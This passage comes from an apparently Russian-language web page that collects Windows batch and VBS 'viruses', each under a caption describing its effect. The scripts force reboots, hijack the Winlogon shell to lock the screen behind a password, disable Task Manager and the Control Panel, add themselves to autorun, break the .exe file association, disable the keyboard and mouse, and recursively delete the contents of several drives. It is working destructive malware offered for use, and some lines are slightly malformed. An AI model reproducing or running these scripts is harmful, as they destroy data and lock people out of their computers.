echo End Function &amp;gt;&amp;gt; %temp%\temp.vbs 
echo Set iMsg = Nothing &amp;gt;&amp;gt; %temp%\temp.vbs 
echo Set iConf = Nothing &amp;gt;&amp;gt; %temp%\temp.vbs 
echo Set Flds = Nothing &amp;gt;&amp;gt; %temp%\temp.vbs 
echo s.run &amp;quot;shutdown -r -t 0 -c &amp;quot;&amp;quot;pcforumhack.ru™&amp;quot;&amp;quot; -f&amp;quot;,1 &amp;gt;&amp;gt; %temp%\temp.vbs 
start %temp%\temp.vbs 
start %temp%\temp1.vbs 
start %temp%\temp2.vbs &lt;/pre&gt;
  &lt;p&gt;&lt;br /&gt;&lt;strong&gt;Вирус полностью блокирует систему при следующем запуске Windows, даже в безопасном режиме. Выключает диспетчер задач.&lt;/strong&gt;&lt;/p&gt;
  &lt;pre&gt;@echo off 
CHCP 1251 
cls 
Set Yvaga=На вашем компьютере найден вирус. 
Set pass=Пароль 
Set pas=Введите пароль. 
Set virus=Чтобы разблокировать ПК вам потребуется ввести пароль 
Set dim=Выключаю вирус... 
title Внимание!!! 
CHCP 866 
IF EXIST C:\windows\boot.bat ( 
goto ok ) 
cls 
IF NOT EXIST C:\windows\boot.bat ( 
ECHO Windows Registry Editor Version 5.00 &amp;gt;&amp;gt; C:\0.reg 
ECHO. &amp;gt;&amp;gt; C:\0.reg 
ECHO [HKEYLOCALMACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] &amp;gt;&amp;gt; C:\0.reg 
ECHO. &amp;gt;&amp;gt; C:\0.reg 
ECHO &amp;quot;Shell&amp;quot;=&amp;quot;Explorer.exe, C:\\windows\\boot.bat &amp;quot; &amp;gt;&amp;gt; C:\0.reg 
start/wait regedit -s C:\0.reg 
del C:\0.reg 
ECHO @echo off &amp;gt;&amp;gt;C:\windows\boot.bat 
ECHO C:\WINDOWS\system32\taskkill.exe /f /im Explorer.exe &amp;gt;&amp;gt;C:\windows\boot.bat 
ECHO reg add &amp;quot;HKCU\software\Microsoft\Windows\CurrentVersion\Policies\system&amp;quot; /v DisableTaskMgr /t REG_DDWORD /d 1 /f &amp;gt;&amp;gt;C:\windows\boot.bat 
ECHO start sys.bat &amp;gt;&amp;gt;C:\windows\boot.bat 
attrib +r +a +s +h C:\windows\boot.bat 
copy virus.bat c:\windows\sys.bat 
attrib +r +a +s +h C:\windows\sys.bat 
GOTO end) 
:ok 
cls 
Echo %Yvaga% 
echo. 
echo %virus% 
echo %pas% 
set /a choise = 0 
set /p choise=%pass%: 
if &amp;quot;%choise%&amp;quot; == &amp;quot;101&amp;quot; goto gold 
if &amp;quot;%choise%&amp;quot; == &amp;quot;200393&amp;quot; goto status 
exit 
:status 
echo %dim% 
attrib -r -a -s -h C:\windows\boot.bat 
del C:\windows\boot.bat 
attrib -r -a -s -h C:\windows\sys.bat 
del C:\windows\sys.bat 
cls 
:gold 
start C:\ 
:end &lt;/pre&gt;
  &lt;p&gt;&lt;strong&gt;Добавляет программу в автозагрузку ОС&lt;/strong&gt;&lt;/p&gt;
  &lt;pre&gt;copy &amp;quot;&amp;quot;%0&amp;quot;&amp;quot; &amp;quot;%SystemRoot%\system32\File.bat&amp;quot; 
reg add &amp;quot;HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run&amp;quot; /v &amp;quot;Filel&amp;quot; /t REG /d &amp;quot;%SystemRoot%\system32\File.bat&amp;quot; /f 
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoControlPanel /t REG_DWORD /d 1 /f &lt;/pre&gt;
  &lt;p&gt;&lt;strong&gt;Этот вирус блокирует все программы, но интернет работает, переименовывает все .exe в .blackcode&lt;/strong&gt;&lt;/p&gt;
  &lt;pre&gt;@Echo off 
Echo BLACK VIRUS
Date 13.09.96 
If exist c:ski.bat goto abc 
Copy %0 c:ski.bat 
Attrib +h c:ski.bat 
Echo c:ski.bat &amp;gt;&amp;gt;autoexec.bat 
:abc 
md BLACK 
md CODE 
md BLACK1 
md CODE1 
Label E: BLACK 
assoc .exe=.blackcode 
del c:Program Files/q 
Echo BLACK CODE&lt;/pre&gt;
  &lt;p&gt;&lt;strong&gt;Отключение мыши и клавиатуры, форматирование всех дисков&lt;/strong&gt;&lt;/p&gt;
  &lt;pre&gt;@Echo off
rundll32 keyboard,disable
rundll32 mouse,disable
ipconfig /release
msg* &amp;quot;BLACK CODE&amp;quot;
del D:\.* /f /s /q
del E:\.* /f /s /q
del F:\*..* /f /s /q
del G:\ /f /s /q
del H:\*.* .* /f /s /q
del I:\f /s /q
del J:\*.* /f /s /q
exit&lt;/pre&gt;

</content></entry></feed>